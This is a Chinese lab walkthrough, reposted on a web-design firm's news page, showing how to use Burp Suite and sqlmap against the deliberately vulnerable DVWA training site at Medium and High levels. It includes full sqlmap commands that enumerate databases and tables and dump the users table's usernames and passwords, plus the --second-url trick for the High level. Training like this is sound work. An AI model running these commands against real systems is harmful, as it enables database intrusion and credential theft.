尧图网络科技 Logo 尧图网络科技
  • 首页
  • 关于我们
  • 建站服务
  • UI 设计
  • 案例展示
  • SEO 优化
  • 资讯中心
  • 联系我们

资讯详情

深度解读 · 专业分析

  • 首页
  • 资讯中心
  • /
  • DVWA SQL Injection—Medium and high(使用sqlmap工具注入)

最新资讯

  • 全部资讯
  • 行业动态
  • UI 设计
  • SEO 优化
  • 网站开发

DVWA SQL Injection—Medium and high(使用sqlmap工具注入)

📅 发布时间:2026/6/19 17:09:45 👁 浏览次数:
DVWA   SQL Injection—Medium and high(使用sqlmap工具注入)

DVWA SQL Injection—Medium and high(使用sqlmap工具注入)

前情提要:

(注意:该文中我主要采取的是sqlmap工具的方式进行注入)

我已经配置了的环境与安装好的软件:

  • 小皮面板中的MySQL和Apache环境已经开启
  • 有火狐浏览器,且已经安装好了FoxyProxy网络代理的插件
  • 已经自行安装好了burp suite抓包工具
  • 有sqlmap自动注入的工具
  1. 打开小皮面板中的Apache和MySQL环境

    image-20251203185955238

  2. 从小皮面板中的【网站】打开dvwa靶场

    image-20251203190041029

  3. 进入网站后,我会选择把地址复制粘贴到火狐浏览器中进行下一步(火狐浏览器能方便我们后续的注入操作)

    image-20251203190130331

  4. 输入登录信息后,更改DVWA Security的等级为Medium

    image-20251203190203987

  5. 进入SQL Injection模块中

    image-20251203190524421

  6. 打开我们已经配置好的FoxyProxy代理(对应burp suite抓包工具的地址)

    image-20251203190636448

  7. 打开我们的burp suite抓包工具,开启拦截(拦截是打开的时候就默认开启的)
    image-20251203190725206

SQL Injection——Medium

Medium级别和low级别的SQL Injection有很大不同,没法从输入框进行注入了

可以采取以下的方法:

  1. 尝试burp suite抓包工具进行注入【手工注入】
  2. 使用sqlmap工具进行注入【自动执行】

使用sqlmap工具进行注入

  1. 在我们的DVWA界面中选择一个用户的id,使我们的抓包工具成功抓到包

    image-20251203191347120

  2. 抓到的包我们放到重发器(Repeater)中

    image-20251203191424515

  3. 创建一个新的txt文件(推荐命名为dvwa_m)【在sqlmap的文件中】

    image-20251203191513416

  4. 把我们放在重发器中的内容复制粘贴进去

    image-20251203191943603

image-20251203192107601

  1. 打开我们的sqlmap工具,在有sqlmap.py的文件路径下直接输入“cmd”进入命令行

    image-20251203192133686

  2. 使用python sqlmap.py -h进入sqlmap中(中间按enter)

image-20251203192314244

  1. 获得数据库:

    python .\sqlmap.py -r .\dvwa-m.txt -dbs
    

    image-20251203105615402

  2. 获取表格:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa --tables
    

    image-20251203105821203

  3. 获取表格的字段数据:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users --columns
    

    image-20251203105835106

  4. 获取字段内容:

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users -C user --dump
    

    image-20251203110346837

注意的小点:
  • 在抓包工具中复制的信息的是完整的,不要有错/漏的地方
  • 确保自己的DVWA网站仍在运行中(没有退出等)
  • 确保文件名正确

SQL Injection——High

【简略了很多的步骤和操作过程,但运行其实和Medium是差不多的,只是比Medium多了一个页面,可以不用使用我的这种sqlmap的方法也能做到,直接在第二个弹出的页面当中使用low级别时候的操作就可以了】

high级别通关方法

  • 在第二个页面中采用low测试的方法进行注入
  • 使用参数--second-url进行注入

获取所有数据库:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" --dbs

image-20251203111949953

获取所有表格:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa --tables

image-20251203112018742

获取所有字段:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users --columns

image-20251203112103528

获取所有的字段内容:

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users -C "user,password" --dump

image-20251203113351085

--second-url+查询结果显示页面链接,将会无视这种链接防御

相关新闻

完整教程:Kafka 四个选举,Controller 选举、Partition leader 选举、GroupCoordinator 选举、消费组协调器选举详解

完整教程:Kafka 四个选举,Controller 选举、Partition leader 选举、GroupCoordinator 选举、消费组协调器选举详解

2026/6/19 20:41:36 查看详情
第三方软件测试机构:【“Bug预防”比“Bug发现”更有价值:如何建立缺陷根因分析与流转机制?】 - 详解

第三方软件测试机构:【“Bug预防”比“Bug发现”更有价值:如何建立缺陷根因分析与流转机制?】 - 详解

2026/6/18 23:28:16 查看详情
移动云专业版root分辨率 安卓11

移动云专业版root分辨率 安卓11

2026/6/19 0:50:51 查看详情
MC9S08AC16 Flash安全机制与编程实践:从原理到量产

MC9S08AC16 Flash安全机制与编程实践:从原理到量产

2026/6/19 20:48:41 查看详情
2026矿用潜水泵厂家推荐 - 多才菠萝

2026矿用潜水泵厂家推荐 - 多才菠萝

2026/6/19 20:48:41 查看详情
168.DDPM采样1000步太慢?原生采样瓶颈分析与主流加速方案横向对比

168.DDPM采样1000步太慢?原生采样瓶颈分析与主流加速方案横向对比

2026/6/19 20:48:41 查看详情
测试必学:推荐4个测试用例设计最值得掌握的Agent Skill,几乎覆盖所有用例设计场景!

测试必学:推荐4个测试用例设计最值得掌握的Agent Skill,几乎覆盖所有用例设计场景!

2026/6/19 20:46:30 查看详情
寄快递省钱攻略:2026快递品牌性价比与折扣全对比 - 快递物流资讯

寄快递省钱攻略:2026快递品牌性价比与折扣全对比 - 快递物流资讯

2026/6/19 20:44:21 查看详情
2026 泰州防水补漏靠谱服务商盘点:屋面 / 厨卫 / 外墙 / 地下室渗水维修详解,适配苏中滨江梅雨低洼防水甄选指南 - 宅安选房屋修缮

2026 泰州防水补漏靠谱服务商盘点:屋面 / 厨卫 / 外墙 / 地下室渗水维修详解,适配苏中滨江梅雨低洼防水甄选指南 - 宅安选房屋修缮

2026/6/19 20:44:08 查看详情
行星盘动力学与分子谱线诊断技术解析

行星盘动力学与分子谱线诊断技术解析

2026/6/19 0:01:24 查看详情
2026年成都GEO优化机构怎么选?全维度实用指南 - 刘向阳而生

2026年成都GEO优化机构怎么选?全维度实用指南 - 刘向阳而生

2026/6/19 0:01:39 查看详情
Akagi终极指南:5分钟掌握智能麻将AI助手的完整使用教程

Akagi终极指南:5分钟掌握智能麻将AI助手的完整使用教程

2026/6/19 0:01:39 查看详情
从Landsat到高分系列:手把手教你选择适合自己项目的遥感卫星数据

从Landsat到高分系列:手把手教你选择适合自己项目的遥感卫星数据

2026/6/18 19:44:15 查看详情
福州空调维修上门加氟移机空调不制冷、推荐本地老牌鑫盛达、冷顺安 - 我叫一

福州空调维修上门加氟移机空调不制冷、推荐本地老牌鑫盛达、冷顺安 - 我叫一

2026/6/18 22:29:08 查看详情
嵌入式调试器组件化界面与拖拽交互技术详解

嵌入式调试器组件化界面与拖拽交互技术详解

2026/6/18 22:19:33 查看详情
YOLOv11涨点改进| CVPR 2026 | 独家创新首发、特征融合改进篇| 引入CMGF 引导特征融合机制,实现对不同模态特征的自适应增强与高效融合,助力多模态目标检测,小目标检测或分割有效涨点

YOLOv11涨点改进| CVPR 2026 | 独家创新首发、特征融合改进篇| 引入CMGF 引导特征融合机制,实现对不同模态特征的自适应增强与高效融合,助力多模态目标检测,小目标检测或分割有效涨点

2026/6/18 22:29:00 查看详情
E-E-A-T 成第一权重:2027 年无经验内容将被彻底淘汰

E-E-A-T 成第一权重:2027 年无经验内容将被彻底淘汰

2026/6/18 23:21:38 查看详情
深圳福田园岭老小区搬家公司推荐 经验足师傅高效搬运攻略 - 从来都是英雄出少年

深圳福田园岭老小区搬家公司推荐 经验足师傅高效搬运攻略 - 从来都是英雄出少年

2026/6/18 22:29:04 查看详情

关于尧图

立足北京本地的一站式网站建设服务与设计教学平台,深耕企业网站定制开发、全网 SEO 优化及网络推广服务。

快速链接

  • 关于我们
  • 建站服务
  • 案例展示
  • 资讯中心

服务项目

  • 企业官网定制
  • UI 界面设计
  • SEO 优化推广
  • 移动端适配

联系方式

电话:400-XXX-XXXX

邮箱:info@zskr.cn

地址:北京市朝阳区 XXX 路 XX 号

© 2026 尧图网络科技 版权所有 | 京 ICP 备 XXXXXXXX 号